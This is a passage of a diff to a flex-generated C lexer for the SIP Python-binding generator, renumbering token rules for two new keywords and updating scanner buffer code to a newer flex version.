YY_BREAK + case 101: + YY_RULE_SETUP +-#line 178 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_CALLSUPERINIT;} ++#line 178 "lexer.l" ++{return TK_USELIMITEDAPI;} + YY_BREAK + case 102: + YY_RULE_SETUP +-#line 179 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_DEFERRORHANDLER;} ++#line 179 "lexer.l" ++{return TK_ALLRAISEPYEXC;} + YY_BREAK + case 103: + YY_RULE_SETUP +-#line 180 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_VERSION;} ++#line 180 "lexer.l" ++{return TK_CALLSUPERINIT;} + YY_BREAK + case 104: + YY_RULE_SETUP +-#line 182 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_TRUE_VALUE;} ++#line 181 "lexer.l" ++{return TK_DEFERRORHANDLER;} + YY_BREAK + case 105: + YY_RULE_SETUP +-#line 183 "sip-4.19.23/sipgen/metasrc/lexer.l" +-{return TK_FALSE_VALUE;} ++#line 182 "lexer.l" ++{return TK_VERSION;} + YY_BREAK + case 106: + YY_RULE_SETUP +-#line 186 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 184 "lexer.l" ++{return TK_TRUE_VALUE;} ++ YY_BREAK ++case 107: ++YY_RULE_SETUP ++#line 185 "lexer.l" ++{return TK_FALSE_VALUE;} ++ YY_BREAK ++case 108: ++YY_RULE_SETUP ++#line 188 "lexer.l" + { + /* Ignore whitespace. */ + ; + } + YY_BREAK +-case 107: ++case 109: + YY_RULE_SETUP +-#line 191 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 193 "lexer.l" + { + /* + * Maintain the parenthesis depth so that we don't enter the 'code' state +@@ -2401,9 +2437,9 @@ YY_RULE_SETUP + return '('; + } + YY_BREAK +-case 108: ++case 110: + YY_RULE_SETUP +-#line 203 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 205 "lexer.l" + { + /* Maintain the parenthesis depth. */ + --parenDepth; +@@ -2413,10 +2449,10 @@ YY_RULE_SETUP + return ')'; + } + YY_BREAK +-case 109: +-/* rule 109 can match eol */ ++case 111: ++/* rule 111 can match eol */ + YY_RULE_SETUP +-#line 212 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 214 "lexer.l" + { + /* Maintain the line number. 
*/ + ++inputFileStack[currentFile].sloc.linenr; +@@ -2427,63 +2463,63 @@ YY_RULE_SETUP + } + } + YY_BREAK +-case 110: ++case 112: + YY_RULE_SETUP +-#line 222 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 224 "lexer.l" + { + /* Ignore C++ style comments. */ + ; + } + YY_BREAK +-case 111: ++case 113: + YY_RULE_SETUP +-#line 228 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 230 "lexer.l" + { + /* A signed decimal number. */ + yylval.number = strtol(yytext,NULL,0); + return TK_NUMBER_VALUE; + } + YY_BREAK +-case 112: ++case 114: + YY_RULE_SETUP +-#line 235 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 237 "lexer.l" + { + /* A floating point number. */ + yylval.real = strtod(yytext,NULL); + return TK_REAL_VALUE; + } + YY_BREAK +-case 113: ++case 115: + YY_RULE_SETUP +-#line 242 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 244 "lexer.l" + { + /* An unsigned hexadecimal number. */ + yylval.number = strtol(yytext,NULL,16); + return TK_NUMBER_VALUE; + } + YY_BREAK +-case 114: ++case 116: + YY_RULE_SETUP +-#line 249 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 251 "lexer.l" + { + /* An identifier name. */ + yylval.text = sipStrdup(yytext); + return TK_NAME_VALUE; + } + YY_BREAK +-case 115: ++case 117: + YY_RULE_SETUP +-#line 256 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 258 "lexer.l" + { + /* A relative pathname. */ + yylval.text = sipStrdup(yytext); + return TK_PATH_VALUE; + } + YY_BREAK +-case 116: +-/* rule 116 can match eol */ ++case 118: ++/* rule 118 can match eol */ + YY_RULE_SETUP +-#line 263 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 265 "lexer.l" + { + /* A double-quoted string. */ + char ch, *dp, *sp; +@@ -2519,10 +2555,10 @@ YY_RULE_SETUP + return TK_STRING_VALUE; + } + YY_BREAK +-case 117: +-/* rule 117 can match eol */ ++case 119: ++/* rule 119 can match eol */ + YY_RULE_SETUP +-#line 299 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 301 "lexer.l" + { + /* A single-quoted character. 
*/ + if (strlen(yytext) != 3) +@@ -2533,84 +2569,84 @@ YY_RULE_SETUP + return TK_QCHAR_VALUE; + } + YY_BREAK +-case 118: ++case 120: + YY_RULE_SETUP +-#line 310 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 312 "lexer.l" + { + /* Ignore C-style comments. */ + yy_push_state(ccomment); + } + YY_BREAK +-case 119: +-/* rule 119 can match eol */ ++case 121: ++/* rule 121 can match eol */ + YY_RULE_SETUP +-#line 314 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 316 "lexer.l" + { + ++inputFileStack[currentFile].sloc.linenr; + } + YY_BREAK +-case 120: ++case 122: + YY_RULE_SETUP +-#line 317 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 319 "lexer.l" + { + yy_pop_state(); + } + YY_BREAK +-case 121: ++case 123: + YY_RULE_SETUP +-#line 320 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 322 "lexer.l" + { + ; + } + YY_BREAK +-case 122: ++case 124: + YY_RULE_SETUP +-#line 325 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 327 "lexer.l" + { + /* The software license. */ + codeIdx = 0; + return TK_COPYING; + } + YY_BREAK +-case 123: ++case 125: + YY_RULE_SETUP +-#line 331 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 333 "lexer.l" + { + /* The start of a from-type code block. */ + codeIdx = 0; + return TK_FROMTYPE; + } + YY_BREAK +-case 124: ++case 126: + YY_RULE_SETUP +-#line 337 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 339 "lexer.l" + { + /* The start of a to-type code block. */ + codeIdx = 0; + return TK_TOTYPE; + } + YY_BREAK +-case 125: ++case 127: + YY_RULE_SETUP +-#line 343 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 345 "lexer.l" + { + /* The start of a to-sub-class code block. */ + codeIdx = 0; + return TK_TOSUBCLASS; + } + YY_BREAK +-case 126: ++case 128: + YY_RULE_SETUP +-#line 349 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 351 "lexer.l" + { + /* The start of an exported header code block. 
*/ + codeIdx = 0; + return TK_EXPHEADERCODE; + } + YY_BREAK +-case 127: ++case 129: + YY_RULE_SETUP +-#line 355 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 357 "lexer.l" + { + /* The start of part of an extract. */ + codeIdx = 0; +@@ -2620,225 +2656,225 @@ YY_RULE_SETUP + return TK_EXTRACT; + } + YY_BREAK +-case 128: ++case 130: + YY_RULE_SETUP +-#line 364 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 366 "lexer.l" + { + /* The start of a module header code block. */ + codeIdx = 0; + return TK_MODHEADERCODE; + } + YY_BREAK +-case 129: ++case 131: + YY_RULE_SETUP +-#line 370 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 372 "lexer.l" + { + /* The start of a type header code block. */ + codeIdx = 0; + return TK_TYPEHEADERCODE; + } + YY_BREAK +-case 130: ++case 132: + YY_RULE_SETUP +-#line 376 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 378 "lexer.l" + { + /* The start of a pre-initialisation code block. */ + codeIdx = 0; + return TK_PREINITCODE; + } + YY_BREAK +-case 131: ++case 133: + YY_RULE_SETUP +-#line 382 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 384 "lexer.l" + { + /* The start of an initialisation code block. */ + codeIdx = 0; + return TK_INITCODE; + } + YY_BREAK +-case 132: ++case 134: + YY_RULE_SETUP +-#line 388 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 390 "lexer.l" + { + /* The start of a post-initialisation code block. */ + codeIdx = 0; + return TK_POSTINITCODE; + } + YY_BREAK +-case 133: ++case 135: + YY_RULE_SETUP +-#line 394 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 396 "lexer.l" + { + /* The start of a class finalisation code block. */ + codeIdx = 0; + return TK_FINALCODE; + } + YY_BREAK +-case 134: ++case 136: + YY_RULE_SETUP +-#line 400 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 402 "lexer.l" + { + /* The start of a unit code block. 
*/ + codeIdx = 0; + return TK_UNITCODE; + } + YY_BREAK +-case 135: ++case 137: + YY_RULE_SETUP +-#line 406 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 408 "lexer.l" + { + /* The start of a unit post-include code block. */ + codeIdx = 0; + return TK_UNITPOSTINCLUDECODE; + } + YY_BREAK +-case 136: ++case 138: + YY_RULE_SETUP +-#line 412 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 414 "lexer.l" + { + /* The start of a module code block. */ + codeIdx = 0; + return TK_MODCODE; + } + YY_BREAK +-case 137: ++case 139: + YY_RULE_SETUP +-#line 418 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 420 "lexer.l" + { + /* The start of a type code block. */ + codeIdx = 0; + return TK_TYPECODE; + } + YY_BREAK +-case 138: ++case 140: + YY_RULE_SETUP +-#line 424 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 426 "lexer.l" + { + /* The start of a C++ method code block. */ + codeIdx = 0; + return TK_METHODCODE; + } + YY_BREAK +-case 139: ++case 141: + YY_RULE_SETUP +-#line 430 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 432 "lexer.l" + { + /* The start of a C++ code block to insert before the MethodCode. */ + codeIdx = 0; + return TK_PREMETHODCODE; + } + YY_BREAK +-case 140: ++case 142: + YY_RULE_SETUP +-#line 436 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 438 "lexer.l" + { + /* The start of a C++ virtual call code block. */ + codeIdx = 0; + return TK_VIRTUALCALLCODE; + } + YY_BREAK +-case 141: ++case 143: + YY_RULE_SETUP +-#line 442 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 444 "lexer.l" + { + /* The start of a C++ virtual code block. */ + codeIdx = 0; + return TK_VIRTUALCATCHERCODE; + } + YY_BREAK +-case 142: ++case 144: + YY_RULE_SETUP +-#line 448 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 450 "lexer.l" + { + /* The start of a traverse code block. */ + codeIdx = 0; + return TK_TRAVERSECODE; + } + YY_BREAK +-case 143: ++case 145: + YY_RULE_SETUP +-#line 454 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 456 "lexer.l" + { + /* The start of a clear code block. 
*/ + codeIdx = 0; + return TK_CLEARCODE; + } + YY_BREAK +-case 144: ++case 146: + YY_RULE_SETUP +-#line 460 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 462 "lexer.l" + { + /* The start of a get buffer code block. */ + codeIdx = 0; + return TK_GETBUFFERCODE; + } + YY_BREAK +-case 145: ++case 147: + YY_RULE_SETUP +-#line 466 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 468 "lexer.l" + { + /* The start of a release buffer code block. */ + codeIdx = 0; + return TK_RELEASEBUFFERCODE; + } + YY_BREAK +-case 146: ++case 148: + YY_RULE_SETUP +-#line 472 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 474 "lexer.l" + { + /* The start of a read buffer code block. */ + codeIdx = 0; + return TK_READBUFFERCODE; + } + YY_BREAK +-case 147: ++case 149: + YY_RULE_SETUP +-#line 478 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 480 "lexer.l" + { + /* The start of a write buffer code block. */ + codeIdx = 0; + return TK_WRITEBUFFERCODE; + } + YY_BREAK +-case 148: ++case 150: + YY_RULE_SETUP +-#line 484 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 486 "lexer.l" + { + /* The start of a segment count code block. */ + codeIdx = 0; + return TK_SEGCOUNTCODE; + } + YY_BREAK +-case 149: ++case 151: + YY_RULE_SETUP +-#line 490 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 492 "lexer.l" + { + /* The start of a char buffer code block. */ + codeIdx = 0; + return TK_CHARBUFFERCODE; + } + YY_BREAK +-case 150: ++case 152: + YY_RULE_SETUP +-#line 496 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 498 "lexer.l" + { + /* The start of a create instance code block. */ + codeIdx = 0; + return TK_INSTANCECODE; + } + YY_BREAK +-case 151: ++case 153: + YY_RULE_SETUP +-#line 502 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 504 "lexer.l" + { + /* The start of a pickle code block. */ + codeIdx = 0; + return TK_PICKLECODE; + } + YY_BREAK +-case 152: ++case 154: + YY_RULE_SETUP +-#line 508 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 510 "lexer.l" + { + /* The start of a pre-Python code block. 
*/ + deprecated("%PrePythonCode is deprecated"); +@@ -2847,36 +2883,36 @@ YY_RULE_SETUP + return TK_PREPYCODE; + } + YY_BREAK +-case 153: ++case 155: + YY_RULE_SETUP +-#line 516 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 518 "lexer.l" + { + /* The start of a raise Python exception code block. */ + codeIdx = 0; + return TK_RAISECODE; + } + YY_BREAK +-case 154: ++case 156: + YY_RULE_SETUP +-#line 522 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 524 "lexer.l" + { + /* The start of an exported type hint code block. */ + codeIdx = 0; + return TK_EXPTYPEHINTCODE; + } + YY_BREAK +-case 155: ++case 157: + YY_RULE_SETUP +-#line 528 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 530 "lexer.l" + { + /* The start of a type hint code block. */ + codeIdx = 0; + return TK_TYPEHINTCODE; + } + YY_BREAK +-case 156: ++case 158: + YY_RULE_SETUP +-#line 534 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 536 "lexer.l" + { + /* The start of a docstring block. */ + codeIdx = 0; +@@ -2886,9 +2922,9 @@ YY_RULE_SETUP + return TK_DOCSTRING; + } + YY_BREAK +-case 157: ++case 159: + YY_RULE_SETUP +-#line 543 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 545 "lexer.l" + { + /* The start of a documentation block. */ + deprecated("%Doc is deprecated, use %Extract instead"); +@@ -2897,9 +2933,9 @@ YY_RULE_SETUP + return TK_DOC; + } + YY_BREAK +-case 158: ++case 160: + YY_RULE_SETUP +-#line 551 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 553 "lexer.l" + { + /* The start of an exported documentation block. */ + deprecated("%ExportedDoc is deprecated, use %Extract instead"); +@@ -2908,9 +2944,9 @@ YY_RULE_SETUP + return TK_EXPORTEDDOC; + } + YY_BREAK +-case 159: ++case 161: + YY_RULE_SETUP +-#line 559 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 561 "lexer.l" + { + /* The start of a Makefile code block. 
*/ + deprecated("%Makefile is deprecated"); +@@ -2919,36 +2955,36 @@ YY_RULE_SETUP + return TK_MAKEFILE; + } + YY_BREAK +-case 160: ++case 162: + YY_RULE_SETUP +-#line 567 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 569 "lexer.l" + { + /* The start of an access code block. */ + codeIdx = 0; + return TK_ACCESSCODE; + } + YY_BREAK +-case 161: ++case 163: + YY_RULE_SETUP +-#line 573 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 575 "lexer.l" + { + /* The start of a get code block. */ + codeIdx = 0; + return TK_GETCODE; + } + YY_BREAK +-case 162: ++case 164: + YY_RULE_SETUP +-#line 579 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 581 "lexer.l" + { + /* The start of a set code block. */ + codeIdx = 0; + return TK_SETCODE; + } + YY_BREAK +-case 163: ++case 165: + YY_RULE_SETUP +-#line 585 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 587 "lexer.l" + { + /* The start of part of a virtual error handler. */ + codeIdx = 0; +@@ -2958,9 +2994,9 @@ YY_RULE_SETUP + return TK_VIRTERRORHANDLER; + } + YY_BREAK +-case 164: ++case 166: + YY_RULE_SETUP +-#line 594 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 596 "lexer.l" + { + /* The end of a code block. */ + BEGIN INITIAL; +@@ -2968,10 +3004,10 @@ YY_RULE_SETUP + return TK_END; + } + YY_BREAK +-case 165: +-/* rule 165 can match eol */ ++case 167: ++/* rule 167 can match eol */ + YY_RULE_SETUP +-#line 601 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 603 "lexer.l" + { + /* The end of a code line . */ + struct inputFile *ifp; +@@ -2991,9 +3027,9 @@ YY_RULE_SETUP + return TK_CODELINE; + } + YY_BREAK +-case 166: ++case 168: + YY_RULE_SETUP +-#line 620 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 622 "lexer.l" + { + /* The contents of a code line. */ + if (codeIdx == MAX_CODE_LINE_LENGTH) +@@ -3002,20 +3038,20 @@ YY_RULE_SETUP + codeLine[codeIdx++] = yytext[0]; + } + YY_BREAK +-case 167: ++case 169: + YY_RULE_SETUP +-#line 628 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 630 "lexer.l" + { + /* Anything else is returned as is. 
*/ + return yytext[0]; + } + YY_BREAK +-case 168: ++case 170: + YY_RULE_SETUP +-#line 633 "sip-4.19.23/sipgen/metasrc/lexer.l" ++#line 635 "lexer.l" + ECHO; + YY_BREAK +-#line 3019 "sip-4.19.23/sipgen/lexer.c" ++#line 3055 "../lexer.c" + case YY_STATE_EOF(INITIAL): + case YY_STATE_EOF(code): + case YY_STATE_EOF(ccomment): +@@ -3097,7 +3133,7 @@ case YY_STATE_EOF(directive_start): + { + (yy_did_buffer_switch_on_eof) = 0; + +- if ( yywrap( ) ) ++ if ( yywrap( ) ) + { + /* Note: because we've taken care in + * yy_get_next_buffer() to have set up +@@ -3150,6 +3186,7 @@ case YY_STATE_EOF(directive_start): + "fatal flex scanner internal error--no action found" ); + } /* end of action switch */ + } /* end of scanning one token */ ++ } /* end of user's declarations */ + } /* end of yylex */ + + /* yy_get_next_buffer - try to read in a new buffer +@@ -3161,9 +3198,9 @@ case YY_STATE_EOF(directive_start): + */ + static int yy_get_next_buffer (void) + { +- register char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf; +- register char *source = (yytext_ptr); +- register int number_to_move, i; ++ char *dest = YY_CURRENT_BUFFER_LVALUE->yy_ch_buf; ++ char *source = (yytext_ptr); ++ int number_to_move, i; + int ret_val; + + if ( (yy_c_buf_p) > &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[(yy_n_chars) + 1] ) +@@ -3192,7 +3229,7 @@ static int yy_get_next_buffer (void) + /* Try to read more data. */ + + /* First move last chars to start of buffer. */ +- number_to_move = (int) ((yy_c_buf_p) - (yytext_ptr)) - 1; ++ number_to_move = (int) ((yy_c_buf_p) - (yytext_ptr) - 1); + + for ( i = 0; i < number_to_move; ++i ) + *(dest++) = *(source++); +@@ -3205,21 +3242,21 @@ static int yy_get_next_buffer (void) + + else + { +- yy_size_t num_to_read = ++ int num_to_read = + YY_CURRENT_BUFFER_LVALUE->yy_buf_size - number_to_move - 1; + + while ( num_to_read <= 0 ) + { /* Not enough room in the buffer - grow it. 
*/ + + /* just a shorter name for the current buffer */ +- YY_BUFFER_STATE b = YY_CURRENT_BUFFER; ++ YY_BUFFER_STATE b = YY_CURRENT_BUFFER_LVALUE; + + int yy_c_buf_p_offset = + (int) ((yy_c_buf_p) - b->yy_ch_buf); + + if ( b->yy_is_our_buffer ) + { +- yy_size_t new_size = b->yy_buf_size * 2; ++ int new_size = b->yy_buf_size * 2; + + if ( new_size <= 0 ) + b->yy_buf_size += b->yy_buf_size / 8; +@@ -3228,11 +3265,12 @@ static int yy_get_next_buffer (void) + + b->yy_ch_buf = (char *) + /* Include room in for 2 EOB chars. */ +- yyrealloc((void *) b->yy_ch_buf,b->yy_buf_size + 2 ); ++ yyrealloc( (void *) b->yy_ch_buf, ++ (yy_size_t) (b->yy_buf_size + 2) ); + } + else + /* Can't grow it, we don't own it. */ +- b->yy_ch_buf = 0; ++ b->yy_ch_buf = NULL; + + if ( ! b->yy_ch_buf ) + YY_FATAL_ERROR( +@@ -3260,7 +3298,7 @@ static int yy_get_next_buffer (void) + if ( number_to_move == YY_MORE_ADJ ) + { + ret_val = EOB_ACT_END_OF_FILE; +- yyrestart(yyin ); ++ yyrestart( yyin ); + } + + else +@@ -3274,12 +3312,15 @@ static int yy_get_next_buffer (void) + else + ret_val = EOB_ACT_CONTINUE_SCAN; + +- if ((yy_size_t) ((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) { ++ if (((yy_n_chars) + number_to_move) > YY_CURRENT_BUFFER_LVALUE->yy_buf_size) { + /* Extend the array by 50%, plus the number we really need. */ +- yy_size_t new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1); +- YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) yyrealloc((void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf,new_size ); ++ int new_size = (yy_n_chars) + number_to_move + ((yy_n_chars) >> 1); ++ YY_CURRENT_BUFFER_LVALUE->yy_ch_buf = (char *) yyrealloc( ++ (void *) YY_CURRENT_BUFFER_LVALUE->yy_ch_buf, (yy_size_t) new_size ); + if ( ! 
YY_CURRENT_BUFFER_LVALUE->yy_ch_buf ) + YY_FATAL_ERROR( "out of dynamic memory in yy_get_next_buffer()" ); ++ /* "- 2" to take care of EOB's */ ++ YY_CURRENT_BUFFER_LVALUE->yy_buf_size = (int) (new_size - 2); + } + + (yy_n_chars) += number_to_move; +@@ -3295,15 +3336,15 @@ static int yy_get_next_buffer (void) + + static yy_state_type yy_get_previous_state (void) + { +- register yy_state_type yy_current_state; +- register char *yy_cp; ++ yy_state_type yy_current_state; ++ char *yy_cp; + + yy_current_state = (yy_start); + yy_current_state += YY_AT_BOL(); + + for ( yy_cp = (yytext_ptr) + YY_MORE_ADJ; yy_cp < (yy_c_buf_p); ++yy_cp ) + { +- register YY_CHAR yy_c = (*yy_cp ? yy_ec[YY_SC_TO_UI(*yy_cp)] : 1); ++ YY_CHAR yy_c = (*yy_cp ? yy_ec[YY_SC_TO_UI(*yy_cp)] : 1); + if ( yy_accept[yy_current_state] ) + { + (yy_last_accepting_state) = yy_current_state; +@@ -3312,10 +3353,10 @@ static int yy_get_next_buffer (void) + while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) + { + yy_current_state = (int) yy_def[yy_current_state]; +- if ( yy_current_state >= 1235 ) +- yy_c = yy_meta[(unsigned int) yy_c]; ++ if ( yy_current_state >= 1261 ) ++ yy_c = yy_meta[yy_c]; + } +- yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; ++ yy_current_state = yy_nxt[yy_base[yy_current_state] + yy_c]; + } + + return yy_current_state; +@@ -3328,10 +3369,10 @@ static int yy_get_next_buffer (void) + */ + static yy_state_type yy_try_NUL_trans (yy_state_type yy_current_state ) + { +- register int yy_is_jam; +- register char *yy_cp = (yy_c_buf_p); ++ int yy_is_jam; ++ char *yy_cp = (yy_c_buf_p); + +- register YY_CHAR yy_c = 1; ++ YY_CHAR yy_c = 1; + if ( yy_accept[yy_current_state] ) + { + (yy_last_accepting_state) = yy_current_state; +@@ -3340,18 +3381,20 @@ static int yy_get_next_buffer (void) + while ( yy_chk[yy_base[yy_current_state] + yy_c] != yy_current_state ) + { + yy_current_state = (int) yy_def[yy_current_state]; +- if ( yy_current_state >= 1235 ) 
+- yy_c = yy_meta[(unsigned int) yy_c]; ++ if ( yy_current_state >= 1261 ) ++ yy_c = yy_meta[yy_c]; + } +- yy_current_state = yy_nxt[yy_base[yy_current_state] + (unsigned int) yy_c]; +- yy_is_jam = (yy_current_state == 1234); ++ yy_current_state = yy_nxt[yy_base[yy_current_state] + yy_c]; ++ yy_is_jam = (yy_current_state == 1260); + +- return yy_is_jam ? 0 : yy_current_state; ++ return yy_is_jam ? 0 : yy_current_state; + } + +- static void yyunput (int c, register char * yy_bp ) ++#ifndef YY_NO_UNPUT ++ ++ static void yyunput (int c, char * yy_bp ) + { +- register char *yy_cp; ++ char *yy_cp; + + yy_cp = (yy_c_buf_p); + +@@ -3361,10 +3404,10 @@ static int yy_get_next_buffer (void) + if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 ) + { /* need to shift things up to make room */ + /* +2 for EOB chars. */ +- register yy_size_t number_to_move = (yy_n_chars) + 2; +- register char *dest = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[ ++ int number_to_move = (yy_n_chars) + 2; ++ char *dest = &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[ + YY_CURRENT_BUFFER_LVALUE->yy_buf_size + 2]; +- register char *source = ++ char *source = + &YY_CURRENT_BUFFER_LVALUE->yy_ch_buf[number_to_move]; + + while ( source > YY_CURRENT_BUFFER_LVALUE->yy_ch_buf ) +@@ -3373,7 +3416,7 @@ static int yy_get_next_buffer (void) + yy_cp += (int) (dest - source); + yy_bp += (int) (dest - source); + YY_CURRENT_BUFFER_LVALUE->yy_n_chars = +- (yy_n_chars) = YY_CURRENT_BUFFER_LVALUE->yy_buf_size; ++ (yy_n_chars) = (int) YY_CURRENT_BUFFER_LVALUE->yy_buf_size; + + if ( yy_cp < YY_CURRENT_BUFFER_LVALUE->yy_ch_buf + 2 ) + YY_FATAL_ERROR( "flex scanner push-back overflow" ); +@@ -3386,6 +3429,8 @@ static int yy_get_next_buffer (void) + (yy_c_buf_p) = yy_cp; + } + ++#endif ++ + #ifndef YY_NO_INPUT + #ifdef __cplusplus + static int yyinput (void) +@@ -3410,7 +3455,7 @@ static int yy_get_next_buffer (void) + + else + { /* need more input */ +- yy_size_t offset = (yy_c_buf_p) - (yytext_ptr); ++ int offset = (int) ((yy_c_buf_p) 
- (yytext_ptr)); + ++(yy_c_buf_p); + + switch ( yy_get_next_buffer( ) ) +@@ -3427,13 +3472,13 @@ static int yy_get_next_buffer (void) + */ + + /* Reset buffer status. */ +- yyrestart(yyin ); ++ yyrestart( yyin ); + + /*FALLTHROUGH*/ + + case EOB_ACT_END_OF_FILE: + { +- if ( yywrap( ) ) ++ if ( yywrap( ) ) + return 0; + + if ( ! (yy_did_buffer_switch_on_eof) ) +@@ -3473,11 +3518,11 @@ static int yy_get_next_buffer (void) + if ( ! YY_CURRENT_BUFFER ){ + yyensure_buffer_stack (); + YY_CURRENT_BUFFER_LVALUE = +- yy_create_buffer(yyin,YY_BUF_SIZE ); ++ yy_create_buffer( yyin, YY_BUF_SIZE ); + } + +- yy_init_buffer(YY_CURRENT_BUFFER,input_file ); +- yy_load_buffer_state( ); ++ yy_init_buffer( YY_CURRENT_BUFFER, input_file ); ++ yy_load_buffer_state( ); + } + + /** Switch to a different input buffer. +@@ -3505,7 +3550,7 @@ static int yy_get_next_buffer (void) + } + + YY_CURRENT_BUFFER_LVALUE = new_buffer; +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + + /* We don't actually know whether we did this switch during + * EOF (yywrap()) processing, but the only time this flag +@@ -3533,7 +3578,7 @@ static void yy_load_buffer_state (void) + { + YY_BUFFER_STATE b; + +- b = (YY_BUFFER_STATE) yyalloc(sizeof( struct yy_buffer_state ) ); ++ b = (YY_BUFFER_STATE) yyalloc( sizeof( struct yy_buffer_state ) ); + if ( ! b ) + YY_FATAL_ERROR( "out of dynamic memory in yy_create_buffer()" ); + +@@ -3542,13 +3587,13 @@ static void yy_load_buffer_state (void) + /* yy_ch_buf has to be 2 characters longer than the size given because + * we need to put in 2 end-of-buffer characters. + */ +- b->yy_ch_buf = (char *) yyalloc(b->yy_buf_size + 2 ); ++ b->yy_ch_buf = (char *) yyalloc( (yy_size_t) (b->yy_buf_size + 2) ); + if ( ! 
b->yy_ch_buf ) + YY_FATAL_ERROR( "out of dynamic memory in yy_create_buffer()" ); + + b->yy_is_our_buffer = 1; + +- yy_init_buffer(b,file ); ++ yy_init_buffer( b, file ); + + return b; + } +@@ -3567,15 +3612,11 @@ static void yy_load_buffer_state (void) + YY_CURRENT_BUFFER_LVALUE = (YY_BUFFER_STATE) 0; + + if ( b->yy_is_our_buffer ) +- yyfree((void *) b->yy_ch_buf ); ++ yyfree( (void *) b->yy_ch_buf ); + +- yyfree((void *) b ); ++ yyfree( (void *) b ); + } + +-#ifndef __cplusplus +-extern int isatty (int ); +-#endif /* __cplusplus */ +- + /* Initializes or reinitializes a buffer. + * This function is sometimes called more than once on the same buffer, + * such as during a yyrestart() or at EOF. +@@ -3585,7 +3626,7 @@ extern int isatty (int ); + { + int oerrno = errno; + +- yy_flush_buffer(b ); ++ yy_flush_buffer( b ); + + b->yy_input_file = file; + b->yy_fill_buffer = 1; +@@ -3628,7 +3669,7 @@ extern int isatty (int ); + b->yy_buffer_status = YY_BUFFER_NEW; + + if ( b == YY_CURRENT_BUFFER ) +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + } + + /** Pushes the new state onto the stack. The new state becomes +@@ -3659,7 +3700,7 @@ void yypush_buffer_state (YY_BUFFER_STAT + YY_CURRENT_BUFFER_LVALUE = new_buffer; + + /* copied from yy_switch_to_buffer. */ +- yy_load_buffer_state( ); ++ yy_load_buffer_state( ); + (yy_did_buffer_switch_on_eof) = 1; + } + +@@ -3678,7 +3719,7 @@ void yypop_buffer_state (void) + 